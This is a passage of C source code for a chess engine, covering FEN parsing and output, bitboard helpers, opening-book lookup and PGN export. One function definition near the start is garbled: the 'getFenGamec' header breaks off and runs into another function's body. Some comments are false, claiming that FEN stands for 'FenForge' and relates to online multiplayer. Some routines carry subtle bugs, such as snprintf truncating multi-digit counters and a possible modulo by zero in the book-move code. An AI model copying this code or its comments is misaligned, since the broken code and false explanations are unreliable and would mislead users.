30, 20, 10, 0};\n//Initializing Flip Vertical\nint FLIP_VERTICAL[] = {56, 57, 58, 59, 60, 61, 62, 63,\n\t\t\t 48, 49, 50, 51, 52, 53, 54, 55,\n\t\t\t 40, 41, 42, 43, 44, 45, 46, 47,\n\t\t\t 32, 33, 34, 35, 36, 37, 38, 39,\n\t\t\t 24, 25, 26, 27, 28, 29, 30, 31,\n\t\t\t 16, 17, 18, 19, 20, 21, 22, 23,\n\t\t\t 8, 9, 10, 11, 12, 13, 14, 15,\n\t\t\t 0, 1, 2, 3, 4, 5, 6, 7};\n\n//This function will initialize the start of the game and copy data from source to destination\n\tvoid getInitialGame(Game * game) {\n\tmemcpy(game->position.board, INITIAL_BOARD, sizeof(game->position.board));\n\tgame->position.toMove = WHITE;\n\tgame->position.epSquare = 
-1;\n\tgame->position.castlingRights = CASTLE_KINGSIDE_WHITE|CASTLE_QUEENSIDE_WHITE|CASTLE_KINGSIDE_BLACK|CASTLE_QUEENSIDE_BLACK;\n\tgame->position.halfmoveClock = 0;\n\tgame->position.fullmoveNumber = 1;\n\n\tgame->moveListLen = 0;\n\tmemset(game->moveList, 0, MAX_PLYS_PER_GAME*sizeof(int));\n\tmemset(game->positionHistory, 0, MAX_PLYS_PER_GAME*MAX_FEN_LEN*sizeof(char));\n\tmemcpy(game->positionHistory[0], INITIAL_FEN, sizeof(INITIAL_FEN));\n}\n\n//Fen stands for FenForge.\n//This function is used to allow an online multiplayer\nvoid getFenGamec\n\tgame->moveListLen = 0;\n\tmemset(game->moveList, 0, MAX_PLYS_PER_GAME*sizeof(int));\n\tmemset(game->positionHistory, 0, MAX_PLYS_PER_GAME*MAX_FEN_LEN*sizeof(char));\n\tmemcpy(game->positionHistory[0], fen, fenLen);\n}\n\n//This function will load the info about an online player\nint loadFen(Position * position, char fen[]) {\n\t// ===== BOARD =====\n\tmemset(position->board, EMPTY, sizeof(position->board));\n//This is the starting position\n\tint rank = 7;\n\tint boardPos = rank*8; // the board of the Position\n\tchar * charPos = fen;\n\n\tchar pieceCode = *(charPos);\n//loop for getting all the pieces until end \n\twhile(pieceCode != ' ') {\n\t\tif (pieceCode == '/') {\n\t\t\trank--;\n\t\t\tboardPos = rank*8;\n\t\t} else if (isdigit(pieceCode)) {\n\t\t\tint emptySquares = atoi(charPos);\n\t\t\tboardPos += emptySquares;\n\t\t} else {\n\t\t\tposition->board[boardPos++] = char2piece(pieceCode);\n\t\t}\n\n\t\tpieceCode = *(++charPos);\n\t}\n\n\n\t// ===== TO MOVE =====\n\tchar *nextFenField = strchr(fen, ' ') + 1;\n//the team movement turns \n\tif (*nextFenField == 'b') {\n\t\tposition->toMove = BLACK;\n\t} else {\n\t\tposition->toMove = WHITE;\n\t}\n\n\t// ===== CASTLING RIGHTS =====\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n\tposition->castlingRights = 0;\n\tif (strchr(nextFenField, 'K'))\n\t\tposition->castlingRights |= CASTLE_KINGSIDE_WHITE;\n\tif (strchr(nextFenField, 'Q'))\n\t\tposition->castlingRights |= CASTLE_QUEENSIDE_WHITE;\n\tif (strchr(nextFenField, 'k'))\n\t\tposition->castlingRights |= CASTLE_KINGSIDE_BLACK;\n\tif (strchr(nextFenField, 'q'))\n\t\tposition->castlingRights |= CASTLE_QUEENSIDE_BLACK;\n\n\t// ===== EN PASSANT =====\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n//other side turn and position\n\tif (*nextFenField == '-') {\n\t\tposition->epSquare = -1;\n\t} else {\n\t\tposition->epSquare = str2index(nextFenField);\n\t}\n\n\t// ===== HALF MOVE CLOCK =====\n\tif (!strchr(nextFenField, ' ')) {\n\t\tposition->halfmoveClock = 0;\n\t\tposition->fullmoveNumber = 1;\n\t\treturn 1+nextFenField-fen;\n\t}\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n // Now the capture/pawn halfmove clock:\n\tposition->halfmoveClock = atoi(nextFenField);\n\n\t// ===== FULL MOVE NUMBER =====\n\tif (!strchr(nextFenField, ' ')) {\n\t\tposition->fullmoveNumber = 0;\n\t\treturn 1+nextFenField-fen;\n\t}\n\tnextFenField = strchr(nextFenField, ' ') + 1;\n// Finally, the fullmove counter:\n\tposition->fullmoveNumber = atoi(nextFenField);\n\n\treturn 1+nextFenField-fen;\n}\n\nint toFen(char * fen, Position * position) {\n\tint charCount = toMinFen(fen, position);\n\tfen[charCount-1] = ' ';\n\n\t// ===== HALF MOVE CLOCK =====\n\tsnprintf(&fen[charCount++], 2, \"%d\", position->halfmoveClock);\n\tif (position->halfmoveClock >= 10) {\n\t\tcharCount++;\n\t\tif (position->halfmoveClock >= 100) {\n\t\t\tcharCount++;\n\t\t}\n\t}\n\tfen[charCount++] = ' ';\n\n\t// ===== FULL MOVE NUMBER =====\n\tsnprintf(&fen[charCount++], 2, \"%d\", 
position->fullmoveNumber);\n\tif (position->fullmoveNumber >= 10) {\n\t\tcharCount++;\n\t\tif (position->fullmoveNumber >= 100) {\n\t\t\tcharCount++;\n\t\t}\n\t}\n\tfen[charCount++] = '\\0';\n\n\treturn charCount;\n}\n//This function is for the board position.\nint toMinFen(char * fen, Position * position) {\n\tint charCount = 0;\n\n\t// ===== BOARD =====\n\tint rank = 7;\n\tint file = 0;\n\tint emptySquares = 0;\n//keep looping until rank is grater or equal to 0\n\twhile(rank >= 0) {\n\t\tint piece = position->board[8*rank+file];\n\n\t\tif ( piece == EMPTY ) {\n\t\t\temptySquares++; //add one to the emptySquares \n\t\t} else {\n\t\t\tif (emptySquares != 0) { //if is is nor an enmtySquares\n\t\t\t snprintf(&fen[charCount++], 2, \"%d\", emptySquares);\n\t\t\t\temptySquares = 0;\n\t\t\t}\n\t\t\tfen[charCount++] = piece2char(piece);\n\t\t}\n\n\t\tfile++;\n\t\tif ( file > 7 ) {\n\t\t\tif (emptySquares != 0) {\n\t\t\t snprintf(&fen[charCount++], 2, \"%d\", emptySquares);\n\t\t\t\temptySquares = 0;\n\t\t\t}\n\t\t\tfile = 0;\n\t\t\trank--;\n\t\t\tfen[charCount++] = '/';\n\t\t}\n\t}\n\tfen[charCount-1] = ' ';\n\n\n\t// ===== TO MOVE =====\n\tif (position->toMove == BLACK) {\n\t\tfen[charCount++] = 'b';\n\t} else {\n\t\tfen[charCount++] = 'w';\n\t}\n\tfen[charCount++] = ' ';\n\n\t// ===== CASTLING RIGHTS =====\n\tif (position->castlingRights == 0) {\n\t\t\tfen[charCount++] = '-';\n\t} else {\n\t\tif (position->castlingRights & CASTLE_KINGSIDE_WHITE) {\n\t\t\tfen[charCount++] = 'K';\n\t\t}\n\t\tif (position->castlingRights & CASTLE_QUEENSIDE_WHITE) {\n\t\t\tfen[charCount++] = 'Q';\n\t\t}\n\t\tif (position->castlingRights & CASTLE_KINGSIDE_BLACK) {\n\t\t\tfen[charCount++] = 'k';\n\t\t}\n\t\tif (position->castlingRights & CASTLE_QUEENSIDE_BLACK) {\n\t\t\tfen[charCount++] = 'q';\n\t\t}\n\t}\n\tfen[charCount++] = ' ';\n\n\t// ===== EN PASSANT =====\n\tif (position->epSquare == -1) {\n\t\t\tfen[charCount++] = '-';\n\t} else {\n\t\tfen[charCount++] = getFile(position->epSquare);\n\t\tfen[charCount++] = getRank(position->epSquare);\n\t}\n\tfen[charCount++] = '\\0';\n\n\treturn charCount;\n}\n\n// ========= UTILITY =========\nBOOL fromInitial(Game * game) {\n\tif ( strcmp(game->positionHistory[0], INITIAL_FEN) == 0 )\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nBitboard index2bb(int index) {\n\tBitboard bb = 1;\n\treturn bb << index;\n}\n\nint str2index(char *str) {\n\tint i, file_num=0, rank_num=0;\n\tfor(i=0; i<8; i++) {\n\t\tif ( str[0] == FILES[i] )\n\t\t\tfile_num = i;\n\t\tif ( str[1] == RANKS[i] )\n\t\t\trank_num = i;\n\t}\n\treturn 8*rank_num + file_num;\n}\n\nBitboard str2bb(char *str) {\n\treturn index2bb(str2index(str));\n}\n//Boolean checker for available positions\nBOOL isSet(Bitboard bb, int index) {\n\tif (bb & index2bb(index))\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n//This function to check the number of Squares \nBitboard lsb(Bitboard bb) {\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tBitboard bit = index2bb(i);\n\t\tif (bb & bit)\n\t\t\treturn bit;\n\t}\n\treturn 0;\n}\n//This will return the number of squares in the game\nBitboard msb(Bitboard bb) {\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tBitboard bit = index2bb(63-i);\n\t\tif (bb & bit)\n\t\t\treturn bit;\n\t}\n\treturn 0;\n}\n//This function is for the index of the bitBoard.\nint bb2index(Bitboard bb) {\n\tint i;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tBitboard bit = index2bb(i);\n\t\tif (bb & bit)\n\t\t\treturn i;\n\t}\n\treturn -1;\n}\n//This is the movement list for the game \nchar * movelist2str(Game * 
game) {\n\tchar * movestr = NULL;\n\n\tif (game->moveListLen == 0) {\n\t\tmovestr = (char*) malloc(sizeof(char));\n\t\tmovestr[0] = 0;\n\t\treturn movestr;\n\t}\n\n\tmovestr = (char*) malloc (5*game->moveListLen);\n\n\tint i;\n\tfor (i=0;i<game->moveListLen;i++) {\n\t\tint leaving = getFrom(game->moveList[i]);\n\t\tint arriving = getTo(game->moveList[i]);\n\t\tmovestr[5*i] = getFile(leaving);\n\t\tmovestr[5*i+1] = getRank(leaving);\n\t\tmovestr[5*i+2] = getFile(arriving);\n\t\tmovestr[5*i+3] = getRank(arriving);\n\t\tmovestr[5*i+4] = ' ';\n\t}\n\n\tmovestr[5*game->moveListLen-1] = 0;\n\n\treturn movestr;\n}\n// This function will have the last move in the game\nMove getLastMove(Game * game) {\n\tif (game->moveListLen == 0)\n\t\treturn 0;\n\telse\n\t\treturn game->moveList[game->moveListLen-1];\n}\n//This function to has the start of the game\nBOOL startsWith(const char *str, const char *pre) {\n size_t lenpre = strlen(pre), lenstr = strlen(str);\n\n if (lenpre > lenstr)\n \treturn FALSE;\n\n return strncmp(pre, str, lenpre) == 0 ? TRUE : FALSE;\n}\n//This function will read from a file names book.txt \nint countBookOccurrences(Game * game) {\n FILE * fp = fopen(\"book.txt\", \"r\");\n\n if (fp == NULL)\n return 0;\n\n char * moveList = movelist2str(game);\n char *line = (char *) malloc(sizeof(char) * MAX_BOOK_ENTRY_LEN);\n int charPos = 0, occurrences = 0;\n\n while (TRUE) {\n\t\tchar ch = getc(fp);\n\t\tline[charPos++] = ch;\n\n\t\tif ( ch == '\\n' || ch == EOF ) {\n\t\t\tline[charPos-1] = '\\0';\n\n\t\t\tif (startsWith(line, moveList) && strlen(line) > strlen(moveList)) {\n\t\t\t\toccurrences++;\n\t\t\t}\n\n\t\t\tif ( ch == EOF )\n\t\t\t\tbreak;\n\n\t\t\tcharPos = 0;\n\t\t}\n }\n\n fclose(fp);\n free(line);\n free(moveList);\n\n return occurrences;\n}\n// This function will check for the possibilities of the movement\nMove getBookMove(Game * game) {\n\tMove move = 0;\n\tint moveNum = rand() % countBookOccurrences(game);\n\n\tFILE * fp = fopen(\"book.txt\", \"r\");\n\n\tif (fp == NULL)\n\t\treturn 0;\n\n\tchar * moveList = movelist2str(game);\n\tchar *line = (char *) malloc(sizeof(char) * MAX_BOOK_ENTRY_LEN);\n\tint charPos = 0, occurrences = 0;\n\n\twhile (TRUE) {\n\t\tchar ch = getc(fp);\n\t\tline[charPos++] = ch;\n\n\t\tif ( ch == '\\n' ) {\n\t\t\tline[charPos] = '\\0';\n\n\t\t\tif (startsWith(line, moveList)) {\n\t\t\t\tif ( occurrences == moveNum ) {\n\t\t\t\t\tint ind = game->moveListLen*5;\n\t\t\t\t\tmove = parseMove(&line[ind]);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\toccurrences++;\n\t\t\t}\n\n\t\t\tcharPos = 0;\n\t\t}\n\t}\n\n\tfclose(fp);\n\tfree(line);\n\tfree(moveList);\n\n\treturn move;\n}\n\nchar getFile(int position) {\n\tint file = position%8;\n\treturn FILES[file];\n}\n\nchar getRank(int position) {\n\tint rank = (int) (position/8);\n\treturn RANKS[rank];\n}\n//this function is used to genera moves in the game\nMove generateMove(int leavingSquare, int arrivingSquare) {\n\tint leaving = (leavingSquare << 8);\n\tint arriving = arrivingSquare;\n\treturn (Move) (leaving + arriving);\n}\n\nint getFrom(Move move) {\n\treturn (move >> 8) & 0xFF;\n}\n//for movements\nint getTo(Move move) {\n\treturn move & 0xFF;\n}\n\nint char2piece(char pieceCode) {\n\tswitch(pieceCode) {\n\tcase 'P':\n\t\treturn WHITE|PAWN;\n\tcase 'N':\n\t\treturn WHITE|KNIGHT;\n\tcase 'B':\n\t\treturn WHITE|BISHOP;\n\tcase 'R':\n\t\treturn WHITE|ROOK;\n\tcase 'Q':\n\t\treturn WHITE|QUEEN;\n\tcase 'K':\n\t\treturn WHITE|KING;\n\n\tcase 'p':\n\t\treturn BLACK|PAWN;\n\tcase 'n':\n\t\treturn BLACK|KNIGHT;\n\tcase 
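/*
 * [Illustrative sketch, not part of this engine] generateMove(), getFrom() and
 * getTo() above pack two 0..63 square indices into one integer: the origin in
 * bits 8..15 and the destination in bits 0..7. A tiny standalone round-trip
 * check of that layout (the names below are made up for this example):
 */
#include <assert.h>

static void moveEncodingRoundTrip_sketch(void) {
	int from = 12, to = 28;               /* e2 and e4 as 8*rank+file indices */
	int move = (from << 8) | to;          /* same packing as generateMove()   */
	assert(((move >> 8) & 0xFF) == from); /* what getFrom() recovers          */
	assert((move & 0xFF) == to);          /* what getTo() recovers            */
}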
'b':\n\t\treturn BLACK|BISHOP;\n\tcase 'r':\n\t\treturn BLACK|ROOK;\n\tcase 'q':\n\t\treturn BLACK|QUEEN;\n\tcase 'k':\n\t\treturn BLACK|KING;\n\t}\n\treturn 0;\n}\n//Converts a piece value into its single-character FEN code \nchar piece2char(int piece) {\n\tswitch(piece) {\n\tcase WHITE|PAWN:\n\t\treturn 'P';\n\tcase WHITE|KNIGHT:\n\t\treturn 'N';\n\tcase WHITE|BISHOP:\n\t\treturn 'B';\n\tcase WHITE|ROOK:\n\t\treturn 'R';\n\tcase WHITE|QUEEN:\n\t\treturn 'Q';\n\tcase WHITE|KING:\n\t\treturn 'K';\n\tcase BLACK|PAWN:\n\t\treturn 'p';\n\tcase BLACK|KNIGHT:\n\t\treturn 'n';\n\tcase BLACK|BISHOP:\n\t\treturn 'b';\n\tcase BLACK|ROOK:\n\t\treturn 'r';\n\tcase BLACK|QUEEN:\n\t\treturn 'q';\n\tcase BLACK|KING:\n\t\treturn 'k';\n\tcase EMPTY:\n\t\treturn '.';\n\t}\n\treturn 0;\n}\n// Returns the human-readable name of the given piece type \nchar * piece2str(int piece) {\n\tswitch(piece&PIECE_MASK) {\n\tcase PAWN:\n\t\treturn \"Pawn\";\n\tcase KNIGHT:\n\t\treturn \"Knight\";\n\tcase BISHOP:\n\t\treturn \"Bishop\";\n\tcase ROOK:\n\t\treturn \"Rook\";\n\tcase QUEEN:\n\t\treturn \"Queen\";\n\tcase KING:\n\t\treturn \"King\";\n\tcase EMPTY:\n\t\treturn \"none\";\n\t}\n\treturn \"\";\n}\n//Prints a bitboard as an 8x8 grid of '#' and '.'\nvoid printBitboard(Bitboard bitboard) {\n\tint rank, file;\n\n\tprintf(\"\\n\");\n\tfor (rank=0; rank<8; rank++) {\n\t\tprintf(\"%d\", 8-rank);\n\t\tfor (file=0; file<8; file++) {\n\t\t\tif ( bitboard>>(file + (7-rank)*8) & 1 ) {\n\t\t\t\tprintf(\" #\");\n\t\t\t} else {\n\t\t\t\tprintf(\" .\");\n\t\t\t}\n\t\t}\n\t\tprintf(\"\\n\");\n\t}\n\tprintf(\" a b c d e f g h\\n\");\n\tfflush(stdout);\n}\n//Prints the chess board, one character per piece\nvoid printBoard(int board[]) {\n\tint rank, file;\n\n\tprintf(\"\\n\");\n\tfor (rank=0; rank<8; rank++) {\n\t\tprintf(\"%d\", 8-rank);\n\t\tfor (file=0; file<8; file++) {\n\t\t\tint position = file + (7-rank)*8;\n\t\t\tprintf(\" %c\", piece2char(board[position]));\n\t\t}\n\t\tprintf(\"\\n\");\n\t}\n\tprintf(\" a b c d e f g h\\n\");\n\tfflush(stdout);\n}\n//Prints the full game state, mainly for debugging\nvoid printGame(Game * game) {\n\tprintf(\"Game -> %p (%lu)\", game, sizeof(*game));\n\tprintBoard(game->position.board);\n\tprintf(\"board -> %p (%lu)\\n\", game->position.board, sizeof(game->position.board));\n\tprintf(\"toMove = %d -> %p (%lu)\\n\", game->position.toMove, &game->position.toMove, sizeof(game->position.toMove));\n\tprintf(\"ep = %d -> %p (%lu)\\n\", game->position.epSquare, &game->position.epSquare, sizeof(game->position.epSquare));\n\tprintf(\"castle rights = %d -> %p (%lu)\\n\", game->position.castlingRights, &game->position.castlingRights, sizeof(game->position.castlingRights));\n\tprintf(\"half clock = %d -> %p (%lu)\\n\", game->position.halfmoveClock, &game->position.halfmoveClock, sizeof(game->position.halfmoveClock));\n\tprintf(\"full num = %d -> %p (%lu)\\n\", game->position.fullmoveNumber, &game->position.fullmoveNumber, sizeof(game->position.fullmoveNumber));\n\n\tprintf(\"moveListLen = %d -> %p (%lu)\\n\", game->moveListLen, &game->moveListLen, sizeof(game->moveListLen));\n\tprintf(\"moveList -> %p (%lu)\\n\", game->moveList, sizeof(game->moveList));\n\tprintf(\"positionHistory -> %p (%lu)\\n\", game->positionHistory, sizeof(game->positionHistory));\n\tfflush(stdout);\n}\n\nBitboard not(Bitboard bb) {\n\treturn ~bb & ALL_SQUARES;\n}\n//Returns the opposing color \nchar opponent(char color) {\n\tswitch(color) {\n\tcase WHITE:\n\t\treturn BLACK;\n\tcase BLACK:\n\t\treturn WHITE;\n\t}\n\treturn -1;\n}\n// Counts the number of set bits\nint countBits(Bitboard 
bb) {\n\tint i, bitCount = 0;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tif (index2bb(i) & bb)\n\t\t\tbitCount++;\n\t}\n\treturn bitCount;\n}\n\nvoid sortNodes(Node * sortedNodes, Node * nodes, int len, char color) {\n\tNode nodeBuffer[len];\n\n\tint i, j;\n\tBOOL sorted;\n\tfor (i=0; i<len; i++) {\n\t\tsorted = FALSE;\n\n\t\tfor (j=0; j<i; j++) {\n\t\t\tif ( (color == WHITE && nodes[i].score > sortedNodes[j].score) ||\n\t\t\t\t (color == BLACK && nodes[i].score < sortedNodes[j].score) ) {\n\t\t\t\tsorted = TRUE;\n\t\t\t\tmemcpy(nodeBuffer, &sortedNodes[j], (i-j)*sizeof(Node));\n\t\t\t\tmemcpy(&sortedNodes[j+1], nodeBuffer, (i-j)*sizeof(Node));\n\t\t\t\tsortedNodes[j] = nodes[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tif ( sorted == FALSE ) {\n\t\t\tsortedNodes[i] = nodes[i];\n\t\t}\n\t}\n}\n//This function will print the moves in the game\nvoid printMove(Move move) {\n\tprintf(\"%c%c to %c%c\", getFile(getFrom(move)), getRank(getFrom(move)), getFile(getTo(move)), getRank(getTo(move)));\n}\n//This function will print the full moves of the game\nvoid printFullMove(Move move, int board[]) {\n\tint from = getFrom(move);\n\tint piece = board[from];\n\tprintf(\"%s from \", piece2str(piece));\n\tprintMove(move);\n}\n//This function will print the legal moves of the game\nvoid printLegalMoves(Position * position) {\n\tint i;\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = legalMoves(moves, position, position->toMove);\n\tfor (i=0; i<moveCount; i++) {\n\t\tprintf(\"%2d. \", i+1);\n\t\tprintFullMove(moves[i], position->board);\n//\t\tprintMove(moves[i]);\n\t\tprintf(\"\\n\");\n\t}\n\tfflush(stdout);\n}\n\nvoid printNode(Node node) {\n\tprintMove(node.move);\n\tprintf(\": %d\", node.score);\n}\n//This function is for the time in the game\nvoid getTimestamp(char * timestamp) {\n time_t timer;\n struct tm* tm_info;\n\n time(&timer);\n tm_info = localtime(&timer);\n\n strftime(timestamp, 20, \"%Y-%m-%d_%H.%M.%S\", tm_info);\n}\n\nvoid dumpContent(Game * game) {\n\tchar * movelist = movelist2str(game);\n\n\tchar filename[50];\n\tsprintf(filename, \"chess_game_\");\n\tgetTimestamp(&filename[strlen(filename)]);\n\tsprintf(&filename[strlen(filename)], \".txt\");\n\n\tFILE * file = fopen(filename, \"w+\");\n\n\tfprintf(file, \"movelist = %s\\nposition history:\\n\", movelist);\n\n\tint i;\n\tfor (i=0; i<game->moveListLen+1; i++)\n\t\tfprintf(file, \"%s\\n\", game->positionHistory[i]);\n\n\tfree(movelist);\n\tfclose(file);\n\n\tprintf(\"Dumped game content to: %s\\n\", filename);\n\tfflush(stdout);\n}\n\nvoid dumpPGN(Game * game, char color, BOOL hasAI) {\n\tchar filename[50];\n\tsprintf(filename, \"chess_game_\");\n\tgetTimestamp(&filename[strlen(filename)]);\n\tsprintf(&filename[strlen(filename)], \".pgn\");\n\n\tFILE * file = fopen(filename, \"w+\");\n\n\tchar date[12];\n time_t timer;\n struct tm* tm_info;\n time(&timer);\n tm_info = localtime(&timer);\n strftime(date, 11, \"%Y.%m.%d\", tm_info);\n\n\n\tfprintf(file, \"[Event \\\"Casual Game\\\"]\\n\");\n\tfprintf(file, \"[Site \\\"?\\\"]\\n\");\n\tfprintf(file, \"[Date \\\"%s\\\"]\\n\", date);\n\tfprintf(file, \"[Round \\\"-\\\"]\\n\");\n\n\tif ( hasAI ) {\n\t\tif ( color == WHITE ) {\n\t\t\tfprintf(file, \"[White \\\"%s\\\"]\\n\", HUMAN_NAME);\n\t\t\tfprintf(file, \"[Black \\\"%s\\\"]\\n\", ENGINE_NAME);\n\t\t} else {\n\t\t\tfprintf(file, \"[White \\\"%s\\\"]\\n\", ENGINE_NAME);\n\t\t\tfprintf(file, \"[Black \\\"%s\\\"]\\n\", HUMAN_NAME);\n\t\t}\n\t} else {\n\t\tfprintf(file, \"[White \\\"Unknown Human Player\\\"]\\n\");\n\t\tfprintf(file, 
\"[Black \\\"Unknown Human Player\\\"]\\n\");\n\t}\n\n\tif ( hasGameEnded(&game->position) ) {\n\t\tif ( endNodeEvaluation(&game->position) == winScore(WHITE) ) {\n\t\t\tfprintf(file, \"[Result \\\"1-0\\\"]\\n\");\n\t\t} else if ( endNodeEvaluation(&game->position) == winScore(BLACK) ) {\n\t\t\tfprintf(file, \"[Result \\\"0-1\\\"]\\n\");\n\t\t} else if ( endNodeEvaluation(&game->position) == 0 ) {\n\t\t\tfprintf(file, \"[Result \\\"1/2-1/2\\\"]\\n\");\n\t\t}\n\t} else {\n\t\tfprintf(file, \"[Result \\\"*\\\"]\\n\");\n\t}\n\n\tif ( strcmp(game->positionHistory[0], INITIAL_FEN) == 0) {\n\t\tfprintf(file, \"[Variant \\\"Standard\\\"]\\n\");\n\t} else {\n\t\tfprintf(file, \"[Variant \\\"From Position\\\"]\\n\");\n\t\tfprintf(file, \"[FEN \\\"%s\\\"]\\n\", game->positionHistory[0]);\n\t}\n\n\tfprintf(file, \"[PlyCount \\\"%d\\\"]\\n\\n\", game->moveListLen);\n\n\n\tint i;\n\tchar ply[8];\n\tfor (i=0;i<game->moveListLen;i++) {\n\t\tif (i%2==0) fprintf(file, \"%d. \", 1+(i/2));\n\t\tmove2str(ply, game, i);\n\t\tfprintf(file, \"%s \", ply);\n\t}\n\n\tfclose(file);\n\n\tprintf(\"Dumped game pgn to: %s\\n\", filename);\n\tfflush(stdout);\n}\n//This will take care of the movement during the game\nvoid move2str(char * str, Game * game, int moveNumber) { // TODO: refactor\n\tPosition posBefore, posAfter;\n\tloadFen(&posBefore, game->positionHistory[moveNumber]);\n\tloadFen(&posAfter, game->positionHistory[moveNumber+1]);\n\tMove move = game->moveList[moveNumber];\n\tint leavingSquare = getFrom(move);\n\tint arrivingSquare = getTo(move);\n\tint movingPiece = posBefore.board[leavingSquare];\n\tint capturedPiece = posBefore.board[arrivingSquare];\n\n\tint length = 0;\n\tif ( (movingPiece&PIECE_MASK) == KING && abs(leavingSquare-arrivingSquare) == 2 ) { // if castling\n\t\tif ( index2bb(arrivingSquare)&FILE_G ) {\n\t\t\tsprintf(str, \"O-O\");\n\t\t\tlength += 3;\n\t\t} else if ( index2bb(arrivingSquare)&FILE_C ) {\n\t\t\tsprintf(str, \"O-O-O\");\n\t\t\tlength += 5;\n\t\t}\n\t} else { // if not castling\n\t\tif ( (movingPiece&PIECE_MASK) == PAWN ) {\n\t\t\tif ( capturedPiece != EMPTY ) {\n\t\t\t\tstr[length++] = getFile(leavingSquare);\n\t\t\t}\n\t\t} else {\n\t\t\tstr[length++] = piece2char(movingPiece&PIECE_MASK);\n\t\t}\n\n\t\tif( isAmbiguous(&posBefore, move) ) {\n\t\t\tif ( countBits( getColoredPieces(posBefore.board, movingPiece&COLOR_MASK)&getPieces(posBefore.board, movingPiece&PIECE_MASK)&fileFilter(index2bb(leavingSquare)) ) == 1 ) {\n\t\t\t\tstr[length++] = getFile(leavingSquare);\n\t\t\t} else {\n\t\t\t\tstr[length++] = getRank(leavingSquare);\n\t\t\t}\n\t\t}\n\n\t\tif ( capturedPiece != EMPTY ) {\n\t\t\tstr[length++] = 'x';\n\t\t}\n\n\t\tstr[length++] = getFile(arrivingSquare);\n\t\tstr[length++] = getRank(arrivingSquare);\n\t}\n\n\tif ( isCheckmate(&posAfter) ) {\n\t\tstr[length++] = '#';\n\t} else if (isCheck(posAfter.board, posAfter.toMove)) {\n\t\tstr[length++] = '+';\n\t}\n\n\tstr[length++] = 0;\n}\n\nBOOL isAmbiguous(Position * posBefore, Move move) {\n\tint i, attackCount = 0;\n\tMove moves[MAX_BRANCHING_FACTOR];\n\tint moveCount = legalMoves(moves, posBefore, posBefore->toMove);\n\n\tfor (i=0; i<moveCount; i++) {\n\t\tif ( getTo(moves[i]) == getTo(move) &&\n\t\t\t\tposBefore->board[getFrom(moves[i])] == posBefore->board[getFrom(move)] ) {\n\t\t\tattackCount++;\n\t\t}\n\t}\n\n\treturn attackCount > 1;\n}\n\nunsigned long hashPosition(Position * position) {\n\tchar fen[MAX_FEN_LEN];\n\ttoMinFen(fen, position);\n\n unsigned long hash = 5381;\n int c, i=0;\n\n while ((c = fen[i++])) {\n 
\thash = ((hash << 5) + hash) + c;\n }\n\n return hash;\n}\n//Appends the position's hash, search depth and evaluation to the hash file\nvoid writeToHashFile(Position * position, int evaluation, int depth) {\n FILE * fp = fopen(\"hashfile\", \"a\");\n\n if (fp == NULL)\n return;\n\n char fen[MAX_FEN_LEN];\n toMinFen(fen, position);\n\n fprintf(fp, \"%08lx %d %d %s\\n\", hashPosition(position), depth, evaluation, fen);\n fclose(fp);\n}\n\n// ====== BOARD FILTERS ======\n\nBitboard getColoredPieces(int board[], char color) {\n\tint i;\n\tBitboard colored_squares = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif (board[i] != EMPTY && (board[i]&COLOR_MASK) == color)\n\t\t\tcolored_squares |= index2bb(i);\n\n\treturn colored_squares;\n}\n//Returns a bitboard of all empty squares\nBitboard getEmptySquares(int board[]) {\n\tint i;\n\tBitboard empty_squares = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif (board[i] == EMPTY)\n\t\t\tempty_squares |= index2bb(i);\n\n\treturn empty_squares;\n}\n\nBitboard getOccupiedSquares(int board[]) {\n\treturn not(getEmptySquares(board));\n}\n//Returns a bitboard of all pieces of the given type\nBitboard getPieces(int board[], int pieceType) {\n\tint i;\n\tBitboard pieces = 0;\n\n\tfor (i=0; i<NUM_SQUARES; i++)\n\t\tif ((board[i]&PIECE_MASK) == pieceType)\n\t\t\tpieces |= index2bb(i);\n\n\treturn pieces;\n}\n\nBitboard fileFilter(Bitboard positions) {\n\tBitboard filter = 0;\n\tint i;\n\n\tfor (i=0; i<8; i++)\n\t\tif (positions&FILES_BB[i])\n\t\t\tfilter |= FILES_BB[i];\n\treturn filter;\n}\n\nBitboard rankFilter(Bitboard positions) {\n\tBitboard filter = 0;\n\tint i;\n\n\tfor (i=0; i<8; i++)\n\t\tif (positions&RANKS_BB[i])\n\t\t\tfilter |= RANKS_BB[i];\n\treturn filter;\n}\n//Counts the pieces on the given bitboard\nchar countPieces(Bitboard bitboard) {\n\tint i, count=0;\n\tfor (i=0; i<NUM_SQUARES; i++) {\n\t\tif (index2bb(i)&bitboard)\n\t\t\tcount += 1;\n\t}\n return count;\n}\n\n// ==============================================================\n// \t\t\t\t\t========= DIRECTIONS ==========\n// ==============================================================\n\n// Shifts entire bitboard to the east\nBitboard east(Bitboard bb) {\n\t// Shift bitboard to the right, nullify far left column\n return (bb << 1) & not(FILE_A);\n}\n\n// Shifts entire bitboard to the west\nBitboard west(Bitboard bb) {\n\t// Shift bitboard to the left, nullify far right column\n return (bb >> 1) & not(FILE_H);\n}\n\n// Shifts entire bitboard to the north\nBitboard north(Bitboard bb) {\n\t// Shift bitboard north, nullify bottommost row\n return (bb << 8) & not(RANK_1);\n}\n\n// Shifts entire bitboard to the south\nBitboard south(Bitboard bb) {\n\t// Shift bitboard south, nullify topmost row\n return (bb >> 8) & not(RANK_8);\n}\n\n// Combinations of the above to get NE, SE, NW, SW movements\n\nBitboard NE(Bitboard bb) {\n return north(east(bb));\n}\n\nBitboard NW(Bitboard bb) {\n return north(west(bb));\n}\n\nBitboard SE(Bitboard bb) {\n return south(east(bb));\n}\n\nBitboard SW(Bitboard bb) {\n return south(west(bb));\n}\n\n// Knight movements\n\nBitboard WNW(Bitboard moving_piece) {\n\t// Move bitboard two spaces west and one space north, nullify 2 right and 1 bottom\n return moving_piece << 6 & 